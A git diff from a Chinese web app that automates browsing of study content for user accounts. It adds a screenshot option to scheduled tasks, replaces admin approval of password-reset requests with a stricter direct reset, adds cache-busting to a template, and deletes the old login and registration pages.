weekdaysGroup.style.display = 'block'; weekdaysGroup.style.display = 'block';
screenshotGroup.style.display = 'block';
} else { } else {
timeGroup.style.display = 'none'; timeGroup.style.display = 'none';
browseTypeGroup.style.display = 'none'; browseTypeGroup.style.display = 'none';
weekdaysGroup.style.display = 'none'; weekdaysGroup.style.display = 'none';
screenshotGroup.style.display = 'none';
} }
// 保存按钮始终显示,无论是开启还是关闭定时任务 // 保存按钮始终显示,无论是开启还是关闭定时任务
} }
@@ -2313,6 +2408,7 @@
const enabled = document.getElementById('scheduleEnabled').checked; const enabled = document.getElementById('scheduleEnabled').checked;
const time = document.getElementById('scheduleTime').value; const time = document.getElementById('scheduleTime').value;
const browseType = document.getElementById('scheduleBrowseType').value; const browseType = document.getElementById('scheduleBrowseType').value;
const enableScreenshot = document.getElementById('enableScreenshot').checked;
// 获取选中的星期 // 获取选中的星期
const selectedWeekdays = []; const selectedWeekdays = [];
@@ -2330,7 +2426,7 @@
const weekdayDisplay = selectedWeekdays.map(d => weekdayNames[parseInt(d)]).join('、'); const weekdayDisplay = selectedWeekdays.map(d => weekdayNames[parseInt(d)]).join('、');
const message = enabled const message = enabled
? `确定启用定时任务吗?\n\n执行时间: 每天 ${time}\n执行日期: ${weekdayDisplay}\n浏览类型: ${browseType}\n\n系统将自动执行所有账号的浏览任务(不包含截图)` ? `确定启用定时任务吗?\n\n执行时间: 每天 ${time}\n执行日期: ${weekdayDisplay}\n浏览类型: ${browseType}\n截图: ${enableScreenshot ? '截图' : '不截图'}\n\n系统将自动执行所有账号的浏览任务`
: `确定关闭定时任务吗?`; : `确定关闭定时任务吗?`;
if (!confirm(message)) return; if (!confirm(message)) return;
@@ -2343,7 +2439,8 @@
schedule_enabled: enabled ? 1 : 0, schedule_enabled: enabled ? 1 : 0,
schedule_time: time, schedule_time: time,
schedule_browse_type: browseType, schedule_browse_type: browseType,
schedule_weekdays: weekdaysStr schedule_weekdays: weekdaysStr,
enable_screenshot: enableScreenshot ? 1 : 0
}) })
}); });
@@ -2771,119 +2868,21 @@
} else if (tabName === 'logs') { } else if (tabName === 'logs') {
loadLogUserOptions(); loadLogUserOptions();
loadTaskLogs(); loadTaskLogs();
} else if (tabName === 'pending') {
loadPasswordResets();
} }
}; };
// ==================== 密码重置功能 ==================== // 管理员直接重置用户密码
async function resetUserPassword(userId) {
const newPassword = prompt('请输入新密码至少8位且包含字母和数字:');
if (!newPassword) return;
let passwordResets = []; if (newPassword.length < 8) {
showNotification('密码长度至少8位', 'error');
// 加载密码重置申请列表
async function loadPasswordResets() {
try {
const response = await fetch('/yuyx/api/password_resets');
if (response.ok) {
passwordResets = await response.json();
renderPasswordResets();
}
} catch (error) {
console.error('加载密码重置申请失败:', error);
}
}
// 渲染密码重置申请列表
function renderPasswordResets() {
const container = document.getElementById('passwordResetsList');
if (passwordResets.length === 0) {
container.innerHTML = '<div class="empty-message">暂无密码重置申请</div>';
return; return;
} }
container.innerHTML = ` if (!/[a-zA-Z]/.test(newPassword) || !/\d/.test(newPassword)) {
<div class="table-container"> showNotification('密码必须包含字母和数字', 'error');
<table>
<thead>
<tr>
<th>申请ID</th>
<th>用户名</th>
<th>邮箱</th>
<th>申请时间</th>
<th>操作</th>
</tr>
</thead>
<tbody>
${passwordResets.map(reset => `
<tr>
<td>${reset.id}</td>
<td><strong>${escapeHtml(reset.username)}</strong></td>
<td>${escapeHtml(reset.email || '-')}</td>
<td>${escapeHtml(reset.created_at)}</td>
<td>
<div class="action-buttons">
<button class="btn btn-small btn-success" onclick="approvePasswordReset(${reset.id})">批准</button>
<button class="btn btn-small btn-danger" onclick="rejectPasswordReset(${reset.id})">拒绝</button>
</div>
</td>
</tr>
`).join('')}
</tbody>
</table>
</div>
`;
}
// 批准密码重置申请
async function approvePasswordReset(requestId) {
if (!confirm('确定批准该密码重置申请吗?')) return;
try {
const response = await fetch(`/yuyx/api/password_resets/${requestId}/approve`, {
method: 'POST'
});
const data = await response.json();
if (response.ok) {
showNotification('密码重置申请已批准', 'success');
loadPasswordResets();
} else {
showNotification('批准失败: ' + data.error, 'error');
}
} catch (error) {
showNotification('批准失败: ' + error.message, 'error');
}
}
// 拒绝密码重置申请
async function rejectPasswordReset(requestId) {
if (!confirm('确定拒绝该密码重置申请吗?')) return;
try {
const response = await fetch(`/yuyx/api/password_resets/${requestId}/reject`, {
method: 'POST'
});
const data = await response.json();
if (response.ok) {
showNotification('密码重置申请已拒绝', 'success');
loadPasswordResets();
} else {
showNotification('拒绝失败: ' + data.error, 'error');
}
} catch (error) {
showNotification('拒绝失败: ' + error.message, 'error');
}
}
// 管理员直接重置用户密码
async function resetUserPassword(userId) {
const newPassword = prompt('请输入新密码至少6位:');
if (!newPassword) return;
if (newPassword.length < 6) {
showNotification('密码长度至少6位', 'error');
return; return;
} }

View File

@@ -5,7 +5,11 @@
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" /> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" />
<title>知识管理平台</title> <title>知识管理平台</title>
{% for css_file in app_spa_css_files %} {% for css_file in app_spa_css_files %}
{% if app_spa_build_id %}
<link rel="stylesheet" href="{{ url_for('serve_static', filename=css_file, v=app_spa_build_id) }}" />
{% else %}
<link rel="stylesheet" href="{{ url_for('serve_static', filename=css_file) }}" /> <link rel="stylesheet" href="{{ url_for('serve_static', filename=css_file) }}" />
{% endif %}
{% endfor %} {% endfor %}
</head> </head>
<body> <body>
@@ -16,6 +20,10 @@
window.__APP_INITIAL_STATE__ = {{ app_spa_initial_state | tojson }}; window.__APP_INITIAL_STATE__ = {{ app_spa_initial_state | tojson }};
</script> </script>
{% endif %} {% endif %}
{% if app_spa_build_id %}
<script type="module" src="{{ url_for('serve_static', filename=app_spa_js_file, v=app_spa_build_id) }}"></script>
{% else %}
<script type="module" src="{{ url_for('serve_static', filename=app_spa_js_file) }}"></script> <script type="module" src="{{ url_for('serve_static', filename=app_spa_js_file) }}"></script>
{% endif %}
</body> </body>
</html> </html>

File diff suppressed because it is too large Load Diff

View File

@@ -1,449 +0,0 @@
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>登录 - 知识管理平台</title>
<style>
:root {
--md-primary: #1976D2;
--md-primary-dark: #1565C0;
--md-primary-light: #BBDEFB;
--md-background: #FAFAFA;
--md-surface: #FFFFFF;
--md-error: #B00020;
--md-success: #4CAF50;
--md-on-primary: #FFFFFF;
--md-on-surface: #212121;
--md-on-surface-medium: #666666;
--md-shadow-lg: 0 8px 30px rgba(0,0,0,0.12);
}
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
min-height: 100vh;
display: flex;
justify-content: center;
align-items: center;
padding: 20px;
}
.login-card {
background: var(--md-surface);
border-radius: 16px;
box-shadow: var(--md-shadow-lg);
width: 100%;
max-width: 400px;
overflow: hidden;
}
.login-header {
background: var(--md-primary);
color: var(--md-on-primary);
padding: 32px 24px;
text-align: center;
}
.login-header .logo { font-size: 48px; margin-bottom: 12px; }
.login-header h1 { font-size: 24px; font-weight: 500; margin-bottom: 4px; }
.login-header p { font-size: 14px; opacity: 0.9; }
.login-body { padding: 32px 24px; }
.form-group { margin-bottom: 24px; }
.form-group label { display: block; font-size: 14px; font-weight: 500; color: var(--md-on-surface-medium); margin-bottom: 8px; }
.form-group input {
width: 100%;
padding: 14px 16px;
border: 2px solid #E0E0E0;
border-radius: 8px;
font-size: 16px;
transition: all 0.2s;
background: #FAFAFA;
}
.form-group input:focus {
outline: none;
border-color: var(--md-primary);
background: var(--md-surface);
box-shadow: 0 0 0 3px var(--md-primary-light);
}
.captcha-row { display: flex; gap: 12px; align-items: center; }
.captcha-row input { flex: 1; }
.captcha-code {
font-size: 20px;
font-weight: bold;
letter-spacing: 4px;
color: var(--md-primary);
padding: 10px 16px;
background: var(--md-primary-light);
border-radius: 8px;
user-select: none;
}
.captcha-refresh {
padding: 10px 16px;
background: #F5F5F5;
border: none;
border-radius: 8px;
cursor: pointer;
font-size: 18px;
}
.captcha-refresh:hover { background: #EEEEEE; }
.forgot-link { text-align: right; margin-top: -16px; margin-bottom: 24px; }
.forgot-link a { color: var(--md-primary); text-decoration: none; font-size: 14px; font-weight: 500; }
.forgot-link a:hover { text-decoration: underline; }
.btn-login {
width: 100%;
padding: 16px;
background: var(--md-primary);
color: var(--md-on-primary);
border: none;
border-radius: 8px;
font-size: 16px;
font-weight: 600;
cursor: pointer;
transition: all 0.2s;
text-transform: uppercase;
letter-spacing: 1px;
}
.btn-login:hover { background: var(--md-primary-dark); box-shadow: 0 4px 12px rgba(25, 118, 210, 0.4); }
.register-link {
text-align: center;
margin-top: 24px;
padding-top: 24px;
border-top: 1px solid #E0E0E0;
color: var(--md-on-surface-medium);
font-size: 14px;
}
.register-link a { color: var(--md-primary); text-decoration: none; font-weight: 600; }
.register-link a:hover { text-decoration: underline; }
.message { padding: 12px 16px; border-radius: 8px; margin-bottom: 20px; font-size: 14px; display: none; }
.message.error { background: #FFEBEE; color: var(--md-error); border: 1px solid #FFCDD2; }
.message.success { background: #E8F5E9; color: var(--md-success); border: 1px solid #C8E6C9; }
.modal-overlay {
position: fixed; top: 0; left: 0; right: 0; bottom: 0;
background: rgba(0,0,0,0.5);
display: flex; justify-content: center; align-items: center;
opacity: 0; visibility: hidden; transition: all 0.3s; z-index: 1000; padding: 20px;
}
.modal-overlay.active { opacity: 1; visibility: visible; }
.modal {
background: var(--md-surface);
border-radius: 16px;
width: 100%; max-width: 400px;
box-shadow: var(--md-shadow-lg);
transform: translateY(-20px); transition: transform 0.3s;
}
.modal-overlay.active .modal { transform: translateY(0); }
.modal-header { padding: 24px; border-bottom: 1px solid #E0E0E0; }
.modal-header h2 { font-size: 20px; font-weight: 500; margin-bottom: 4px; }
.modal-header p { font-size: 14px; color: var(--md-on-surface-medium); }
.modal-body { padding: 24px; }
.modal-footer { padding: 16px 24px; border-top: 1px solid #E0E0E0; display: flex; gap: 12px; justify-content: flex-end; }
.btn-secondary { padding: 12px 24px; background: #F5F5F5; color: var(--md-on-surface); border: none; border-radius: 8px; font-size: 14px; font-weight: 600; cursor: pointer; }
.btn-secondary:hover { background: #EEEEEE; }
.btn-primary { padding: 12px 24px; background: var(--md-primary); color: var(--md-on-primary); border: none; border-radius: 8px; font-size: 14px; font-weight: 600; cursor: pointer; }
.btn-primary:hover { background: var(--md-primary-dark); }
@media (max-width: 480px) {
body { padding: 12px; }
.login-card { max-width: 100%; }
.login-header { padding: 24px 20px; }
.login-header .logo { font-size: 40px; margin-bottom: 10px; }
.login-header h1 { font-size: 20px; }
.login-header p { font-size: 13px; }
.login-body { padding: 24px 20px; }
.form-group { margin-bottom: 20px; }
.form-group label { font-size: 13px; }
.form-group input { padding: 12px 14px; font-size: 16px; } /* iOS防止自动缩放 */
.captcha-code { padding: 8px 12px; font-size: 18px; letter-spacing: 3px; }
.captcha-refresh { padding: 8px 12px; font-size: 16px; }
.btn-login { padding: 14px; font-size: 15px; }
.modal { max-width: 100%; }
.modal-header, .modal-body { padding: 20px; }
.modal-header h2 { font-size: 18px; }
.modal-footer { padding: 14px 20px; flex-direction: column; }
.modal-footer button { width: 100%; }
}
</style>
</head>
<body>
<div class="login-card">
<div class="login-header">
<div class="logo">📚</div>
<h1>知识管理平台</h1>
<p>自动化浏览学习内容</p>
</div>
<div class="login-body">
<div id="errorMessage" class="message error"></div>
<div id="successMessage" class="message success"></div>
<form id="loginForm" onsubmit="handleLogin(event)">
<div class="form-group">
<label for="username">用户名</label>
<input type="text" id="username" name="username" placeholder="请输入用户名" required>
</div>
<div class="form-group">
<label for="password">密码</label>
<input type="password" id="password" name="password" placeholder="请输入密码" required>
</div>
<div id="captchaGroup" class="form-group" style="display: none;">
<label for="captcha">验证码</label>
<div class="captcha-row">
<input type="text" id="captcha" name="captcha" placeholder="请输入验证码">
<img id="captchaImage" src="" alt="验证码" style="height: 50px; border: 1px solid #ddd; border-radius: 4px; cursor: pointer;" onclick="refreshCaptcha()" title="点击刷新">
<button type="button" class="captcha-refresh" onclick="refreshCaptcha()">🔄</button>
</div>
</div>
<div class="forgot-link">
<a href="#" onclick="showForgotPassword(event)">忘记密码?</a>
<span id="resendVerifyLink" style="display: none; margin-left: 16px;"><a href="#" onclick="showResendVerify(event)">重发验证邮件</a></span>
</div>
<button type="submit" class="btn-login">登 录</button>
</form>
<div class="register-link">还没有账号? <a href="/register">立即注册</a></div>
</div>
</div>
<div id="forgotPasswordModal" class="modal-overlay" onclick="if(event.target===this)closeForgotPassword()">
<div class="modal">
<div class="modal-header"><h2>重置密码</h2><p id="resetModalDesc">填写信息后等待管理员审核</p></div>
<div class="modal-body">
<div id="modalErrorMessage" class="message error"></div>
<div id="modalSuccessMessage" class="message success"></div>
<!-- 邮件重置方式(启用邮件功能时显示) -->
<form id="emailResetForm" onsubmit="handleEmailReset(event)" style="display: none;">
<div class="form-group"><label>邮箱</label><input type="email" id="emailResetEmail" placeholder="请输入注册邮箱" required></div>
<div class="form-group">
<label>验证码</label>
<div class="captcha-row">
<input type="text" id="emailResetCaptcha" placeholder="请输入验证码" required>
<img id="emailResetCaptchaImage" src="" alt="验证码" style="height: 50px; border: 1px solid #ddd; border-radius: 4px; cursor: pointer;" onclick="refreshEmailResetCaptcha()" title="点击刷新">
<button type="button" class="captcha-refresh" onclick="refreshEmailResetCaptcha()">🔄</button>
</div>
</div>
</form>
<!-- 管理员审核方式(未启用邮件功能时显示) -->
<form id="resetPasswordForm" onsubmit="handleResetPassword(event)">
<div class="form-group"><label>用户名</label><input type="text" id="resetUsername" placeholder="请输入用户名" required></div>
<div class="form-group"><label>邮箱(可选)</label><input type="email" id="resetEmail" placeholder="用于验证身份"></div>
<div class="form-group"><label>新密码</label><input type="password" id="resetNewPassword" placeholder="至少8位包含字母和数字" required></div>
</form>
</div>
<div class="modal-footer">
<button type="button" class="btn-secondary" onclick="closeForgotPassword()">取消</button>
<button type="button" class="btn-primary" id="resetSubmitBtn" onclick="submitResetForm()">提交申请</button>
</div>
</div>
</div>
<!-- 重发验证邮件弹窗 -->
<div id="resendVerifyModal" class="modal-overlay" onclick="if(event.target===this)closeResendVerify()">
<div class="modal">
<div class="modal-header"><h2>重发验证邮件</h2><p>输入注册时使用的邮箱</p></div>
<div class="modal-body">
<div id="resendErrorMessage" class="message error"></div>
<div id="resendSuccessMessage" class="message success"></div>
<form id="resendVerifyForm" onsubmit="handleResendVerify(event)">
<div class="form-group"><label>邮箱</label><input type="email" id="resendEmail" placeholder="请输入注册邮箱" required></div>
<div class="form-group">
<label>验证码</label>
<div class="captcha-row">
<input type="text" id="resendCaptcha" placeholder="请输入验证码" required>
<img id="resendCaptchaImage" src="" alt="验证码" style="height: 50px; border: 1px solid #ddd; border-radius: 4px; cursor: pointer;" onclick="refreshResendCaptcha()" title="点击刷新">
<button type="button" class="captcha-refresh" onclick="refreshResendCaptcha()">🔄</button>
</div>
</div>
</form>
</div>
<div class="modal-footer">
<button type="button" class="btn-secondary" onclick="closeResendVerify()">取消</button>
<button type="button" class="btn-primary" onclick="document.getElementById('resendVerifyForm').dispatchEvent(new Event('submit'))">发送验证邮件</button>
</div>
</div>
</div>
<script>
let captchaSession = '';
let resendCaptchaSession = '';
let emailResetCaptchaSession = '';
let needCaptcha = false;
let emailEnabled = false;
// 页面加载时检查邮箱验证是否启用
window.onload = async function() {
try {
const resp = await fetch('/api/email/verify-status');
const data = await resp.json();
emailEnabled = data.email_enabled;
if (data.register_verify_enabled) {
document.getElementById('resendVerifyLink').style.display = 'inline';
}
} catch (e) {
console.log('获取邮箱验证状态失败', e);
}
};
async function handleLogin(event) {
event.preventDefault();
const username = document.getElementById('username').value.trim();
const password = document.getElementById('password').value.trim();
const captcha = document.getElementById('captcha') ? document.getElementById('captcha').value.trim() : '';
const errorDiv = document.getElementById('errorMessage');
const successDiv = document.getElementById('successMessage');
errorDiv.style.display = 'none';
successDiv.style.display = 'none';
if (!username || !password) { errorDiv.textContent = '用户名和密码不能为空'; errorDiv.style.display = 'block'; return; }
if (needCaptcha && !captcha) { errorDiv.textContent = '请输入验证码'; errorDiv.style.display = 'block'; return; }
try {
const response = await fetch('/api/login', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ username, password, captcha_session: captchaSession, captcha, need_captcha: needCaptcha }) });
const data = await response.json();
if (response.ok) { successDiv.textContent = '登录成功,正在跳转...'; successDiv.style.display = 'block'; setTimeout(() => { window.location.href = '/app'; }, 500); }
else { errorDiv.textContent = data.error || '登录失败'; errorDiv.style.display = 'block'; if (data.need_captcha) { needCaptcha = true; document.getElementById('captchaGroup').style.display = 'block'; await generateCaptcha(); } }
} catch (error) { errorDiv.textContent = '网络错误'; errorDiv.style.display = 'block'; }
}
async function showForgotPassword(event) {
event.preventDefault();
document.getElementById('forgotPasswordModal').classList.add('active');
document.getElementById('modalErrorMessage').style.display = 'none';
document.getElementById('modalSuccessMessage').style.display = 'none';
// 根据邮件功能状态切换显示
if (emailEnabled) {
document.getElementById('emailResetForm').style.display = 'block';
document.getElementById('resetPasswordForm').style.display = 'none';
document.getElementById('resetModalDesc').textContent = '输入注册邮箱,我们将发送重置链接';
document.getElementById('resetSubmitBtn').textContent = '发送重置邮件';
await generateEmailResetCaptcha();
} else {
document.getElementById('emailResetForm').style.display = 'none';
document.getElementById('resetPasswordForm').style.display = 'block';
document.getElementById('resetModalDesc').textContent = '填写信息后等待管理员审核';
document.getElementById('resetSubmitBtn').textContent = '提交申请';
}
}
function closeForgotPassword() {
document.getElementById('forgotPasswordModal').classList.remove('active');
document.getElementById('resetPasswordForm').reset();
document.getElementById('emailResetForm').reset();
document.getElementById('modalErrorMessage').style.display = 'none';
document.getElementById('modalSuccessMessage').style.display = 'none';
}
function submitResetForm() {
if (emailEnabled) {
document.getElementById('emailResetForm').dispatchEvent(new Event('submit'));
} else {
document.getElementById('resetPasswordForm').dispatchEvent(new Event('submit'));
}
}
async function handleResetPassword(event) {
event.preventDefault();
const username = document.getElementById('resetUsername').value.trim();
const email = document.getElementById('resetEmail').value.trim();
const newPassword = document.getElementById('resetNewPassword').value.trim();
const errorDiv = document.getElementById('modalErrorMessage');
const successDiv = document.getElementById('modalSuccessMessage');
errorDiv.style.display = 'none'; successDiv.style.display = 'none';
if (!username || !newPassword) { errorDiv.textContent = '用户名和新密码不能为空'; errorDiv.style.display = 'block'; return; }
if (newPassword.length < 8) { errorDiv.textContent = '密码长度至少8位'; errorDiv.style.display = 'block'; return; }
if (!/[a-zA-Z]/.test(newPassword) || !/\d/.test(newPassword)) { errorDiv.textContent = '密码必须包含字母和数字'; errorDiv.style.display = 'block'; return; }
try {
const response = await fetch('/api/reset_password_request', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ username, email, new_password: newPassword }) });
const data = await response.json();
if (response.ok) { successDiv.textContent = '申请已提交,请等待审核'; successDiv.style.display = 'block'; setTimeout(closeForgotPassword, 2000); }
else { errorDiv.textContent = data.error || '申请失败'; errorDiv.style.display = 'block'; }
} catch (error) { errorDiv.textContent = '网络错误'; errorDiv.style.display = 'block'; }
}
async function generateCaptcha() { try { const response = await fetch('/api/generate_captcha', { method: 'POST', headers: { 'Content-Type': 'application/json' } }); const data = await response.json(); if (data.session_id && data.captcha_image) { captchaSession = data.session_id; document.getElementById('captchaImage').src = data.captcha_image; } } catch (error) { console.error('生成验证码失败:', error); } }
async function refreshCaptcha() { await generateCaptcha(); document.getElementById('captcha').value = ''; }
// 邮件方式重置密码相关函数
async function generateEmailResetCaptcha() {
try {
const response = await fetch('/api/generate_captcha', { method: 'POST', headers: { 'Content-Type': 'application/json' } });
const data = await response.json();
if (data.session_id && data.captcha_image) {
emailResetCaptchaSession = data.session_id;
document.getElementById('emailResetCaptchaImage').src = data.captcha_image;
}
} catch (error) { console.error('生成验证码失败:', error); }
}
async function refreshEmailResetCaptcha() { await generateEmailResetCaptcha(); document.getElementById('emailResetCaptcha').value = ''; }
async function handleEmailReset(event) {
event.preventDefault();
const email = document.getElementById('emailResetEmail').value.trim();
const captcha = document.getElementById('emailResetCaptcha').value.trim();
const errorDiv = document.getElementById('modalErrorMessage');
const successDiv = document.getElementById('modalSuccessMessage');
errorDiv.style.display = 'none'; successDiv.style.display = 'none';
if (!email) { errorDiv.textContent = '请输入邮箱'; errorDiv.style.display = 'block'; return; }
if (!captcha) { errorDiv.textContent = '请输入验证码'; errorDiv.style.display = 'block'; return; }
try {
const response = await fetch('/api/forgot-password', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ email, captcha_session: emailResetCaptchaSession, captcha })
});
const data = await response.json();
if (response.ok) {
successDiv.innerHTML = data.message + '<br><small style="color: #666;">请检查您的邮箱(包括垃圾邮件文件夹)</small>';
successDiv.style.display = 'block';
setTimeout(closeForgotPassword, 3000);
} else {
errorDiv.textContent = data.error || '发送失败';
errorDiv.style.display = 'block';
await refreshEmailResetCaptcha();
}
} catch (error) { errorDiv.textContent = '网络错误'; errorDiv.style.display = 'block'; }
}
// 重发验证邮件相关函数
async function showResendVerify(event) {
event.preventDefault();
document.getElementById('resendVerifyModal').classList.add('active');
await generateResendCaptcha();
}
function closeResendVerify() {
document.getElementById('resendVerifyModal').classList.remove('active');
document.getElementById('resendVerifyForm').reset();
document.getElementById('resendErrorMessage').style.display = 'none';
document.getElementById('resendSuccessMessage').style.display = 'none';
}
async function generateResendCaptcha() {
try {
const response = await fetch('/api/generate_captcha', { method: 'POST', headers: { 'Content-Type': 'application/json' } });
const data = await response.json();
if (data.session_id && data.captcha_image) {
resendCaptchaSession = data.session_id;
document.getElementById('resendCaptchaImage').src = data.captcha_image;
}
} catch (error) { console.error('生成验证码失败:', error); }
}
async function refreshResendCaptcha() { await generateResendCaptcha(); document.getElementById('resendCaptcha').value = ''; }
async function handleResendVerify(event) {
event.preventDefault();
const email = document.getElementById('resendEmail').value.trim();
const captcha = document.getElementById('resendCaptcha').value.trim();
const errorDiv = document.getElementById('resendErrorMessage');
const successDiv = document.getElementById('resendSuccessMessage');
errorDiv.style.display = 'none'; successDiv.style.display = 'none';
if (!email) { errorDiv.textContent = '请输入邮箱'; errorDiv.style.display = 'block'; return; }
if (!captcha) { errorDiv.textContent = '请输入验证码'; errorDiv.style.display = 'block'; return; }
try {
const response = await fetch('/api/resend-verify-email', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ email, captcha_session: resendCaptchaSession, captcha })
});
const data = await response.json();
if (response.ok) {
successDiv.textContent = data.message || '验证邮件已发送,请查收';
successDiv.style.display = 'block';
setTimeout(closeResendVerify, 2000);
} else {
errorDiv.textContent = data.error || '发送失败';
errorDiv.style.display = 'block';
await refreshResendCaptcha();
}
} catch (error) { errorDiv.textContent = '网络错误'; errorDiv.style.display = 'block'; }
}
document.addEventListener('keydown', (e) => { if (e.key === 'Escape') { closeForgotPassword(); closeResendVerify(); } });
</script>
</body>
</html>

View File

@@ -1,318 +0,0 @@
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>用户注册 - 知识管理平台</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: 'Microsoft YaHei', Arial, sans-serif;
background: linear-gradient(135deg, #56CCF2 0%, #2F80ED 100%);
min-height: 100vh;
display: flex;
justify-content: center;
align-items: center;
}
.register-container {
background: white;
border-radius: 10px;
box-shadow: 0 10px 40px rgba(0,0,0,0.2);
width: 400px;
padding: 40px;
}
.register-header {
text-align: center;
margin-bottom: 30px;
}
.register-header h1 {
font-size: 28px;
color: #333;
margin-bottom: 10px;
}
.register-header p {
color: #666;
font-size: 14px;
}
.form-group {
margin-bottom: 20px;
}
.form-group label {
display: block;
margin-bottom: 8px;
color: #333;
font-weight: bold;
}
.form-group input {
width: 100%;
padding: 12px;
border: 1px solid #ddd;
border-radius: 5px;
font-size: 14px;
transition: border-color 0.3s;
}
.form-group input:focus {
outline: none;
border-color: #2F80ED;
}
.form-group small {
color: #888;
font-size: 12px;
display: block;
margin-top: 5px;
}
.btn-register {
width: 100%;
padding: 12px;
background: linear-gradient(135deg, #56CCF2 0%, #2F80ED 100%);
color: white;
border: none;
border-radius: 5px;
font-size: 16px;
font-weight: bold;
cursor: pointer;
transition: transform 0.2s;
}
.btn-register:hover {
transform: translateY(-2px);
}
.btn-register:active {
transform: translateY(0);
}
.login-link {
text-align: center;
margin-top: 20px;
color: #666;
}
.login-link a {
color: #2F80ED;
text-decoration: none;
font-weight: bold;
}
.login-link a:hover {
text-decoration: underline;
}
.error-message {
background: #ffe6e6;
color: #d63031;
padding: 10px;
border-radius: 5px;
margin-bottom: 20px;
display: none;
}
.success-message {
background: #e6ffe6;
color: #27ae60;
padding: 10px;
border-radius: 5px;
margin-bottom: 20px;
display: none;
}
@media (max-width: 480px) {
body { padding: 12px; align-items: flex-start; padding-top: 20px; }
.register-container { width: 100%; max-width: 100%; padding: 24px 20px; }
.register-header h1 { font-size: 24px; }
.register-header p { font-size: 13px; }
.form-group { margin-bottom: 18px; }
.form-group label { font-size: 13px; }
.form-group input { padding: 11px; font-size: 16px; } /* iOS防止自动缩放 */
.form-group small { font-size: 11px; }
.btn-register { padding: 13px; font-size: 15px; }
.login-link { margin-top: 16px; font-size: 14px; }
}
</style>
</head>
<body>
<div class="register-container">
<div class="register-header">
<h1>用户注册</h1>
</div>
<div id="errorMessage" class="error-message"></div>
<div id="successMessage" class="success-message"></div>
<form id="registerForm" onsubmit="handleRegister(event)">
<div class="form-group">
<label for="username">用户名 *</label>
<input type="text" id="username" name="username" required minlength="3">
<small>至少3个字符</small>
</div>
<div class="form-group">
<label for="password">密码 *</label>
<input type="password" id="password" name="password" required minlength="6">
<small>至少6个字符</small>
</div>
<div class="form-group">
<label for="confirm_password">确认密码 *</label>
<input type="password" id="confirm_password" name="confirm_password" required>
</div>
<div class="form-group">
<label for="email">邮箱 <span id="emailRequired" style="color: #d63031; display: none;">*</span></label>
<input type="email" id="email" name="email">
<small id="emailHint">选填,用于接收审核通知</small>
</div>
<div class="form-group">
<label for="captcha">验证码</label>
<div style="display: flex; gap: 10px; align-items: center;">
<input type="text" id="captcha" placeholder="请输入验证码" required style="flex: 1;">
<img id="captchaImage" src="" alt="验证码" style="height: 50px; border: 1px solid #ddd; border-radius: 4px; cursor: pointer;" onclick="refreshCaptcha()" title="点击刷新">
<button type="button" onclick="refreshCaptcha()" style="padding: 8px 15px; background: #f0f0f0; border: 1px solid #ddd; border-radius: 4px; cursor: pointer;">刷新</button>
</div>
</div>
<button type="submit" class="btn-register">注册</button>
</form>
<div class="login-link">
已有账号? <a href="/login">立即登录</a>
</div>
</div>
<script>
let captchaSession = '';
let emailVerifyEnabled = false;
window.onload = async function() {
await generateCaptcha();
await checkEmailVerifyStatus();
};
async function checkEmailVerifyStatus() {
try {
const resp = await fetch('/api/email/verify-status');
const data = await resp.json();
emailVerifyEnabled = data.register_verify_enabled;
if (emailVerifyEnabled) {
document.getElementById('emailRequired').style.display = 'inline';
document.getElementById('email').required = true;
document.getElementById('emailHint').textContent = '必填,用于账号验证';
}
} catch (e) {
console.log('获取邮箱验证状态失败', e);
}
}
async function handleRegister(event) {
event.preventDefault();
const username = document.getElementById('username').value.trim();
const password = document.getElementById('password').value.trim();
const confirmPassword = document.getElementById('confirm_password').value.trim();
const email = document.getElementById('email').value.trim();
const errorDiv = document.getElementById('errorMessage');
const successDiv = document.getElementById('successMessage');
errorDiv.style.display = 'none';
successDiv.style.display = 'none';
// 验证
if (username.length < 3) {
errorDiv.textContent = '用户名至少3个字符';
errorDiv.style.display = 'block';
return;
}
if (password.length < 6) {
errorDiv.textContent = '密码至少6个字符';
errorDiv.style.display = 'block';
return;
}
if (password !== confirmPassword) {
errorDiv.textContent = '两次输入的密码不一致';
errorDiv.style.display = 'block';
return;
}
// 邮箱验证启用时必填
if (emailVerifyEnabled && !email) {
errorDiv.textContent = '请填写邮箱地址用于账号验证';
errorDiv.style.display = 'block';
return;
}
// 邮箱格式验证
if (email && !email.includes('@')) {
errorDiv.textContent = '邮箱格式不正确';
errorDiv.style.display = 'block';
return;
}
try {
const response = await fetch('/api/register', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify({ username, password, email, captcha_session: captchaSession, captcha: document.getElementById('captcha').value.trim() })
});
const data = await response.json();
if (response.ok) {
// 根据是否需要邮箱验证显示不同的消息
if (data.need_verify) {
successDiv.innerHTML = data.message + '<br><small style="color: #666;">请检查您的邮箱(包括垃圾邮件文件夹)</small>';
} else {
successDiv.textContent = data.message || '注册成功,请等待管理员审核';
}
successDiv.style.display = 'block';
// 清空表单
document.getElementById('registerForm').reset();
// 3秒后跳转到登录页
setTimeout(() => {
window.location.href = '/login';
}, 3000);
} else {
errorDiv.textContent = data.error || '注册失败';
errorDiv.style.display = 'block';
refreshCaptcha();
}
} catch (error) {
errorDiv.textContent = '网络错误,请稍后重试';
errorDiv.style.display = 'block';
}
}
async function generateCaptcha() {
const resp = await fetch('/api/generate_captcha', {method: 'POST', headers: {'Content-Type': 'application/json'}});
const data = await resp.json();
if (data.session_id && data.captcha_image) {
captchaSession = data.session_id;
document.getElementById('captchaImage').src = data.captcha_image;
}
}
async function refreshCaptcha() { await generateCaptcha(); document.getElementById('captcha').value = ''; }
</script>
</body>
</html>

View File

@@ -1,266 +0,0 @@
<!DOCTYPE html>
<html lang="zh-CN">
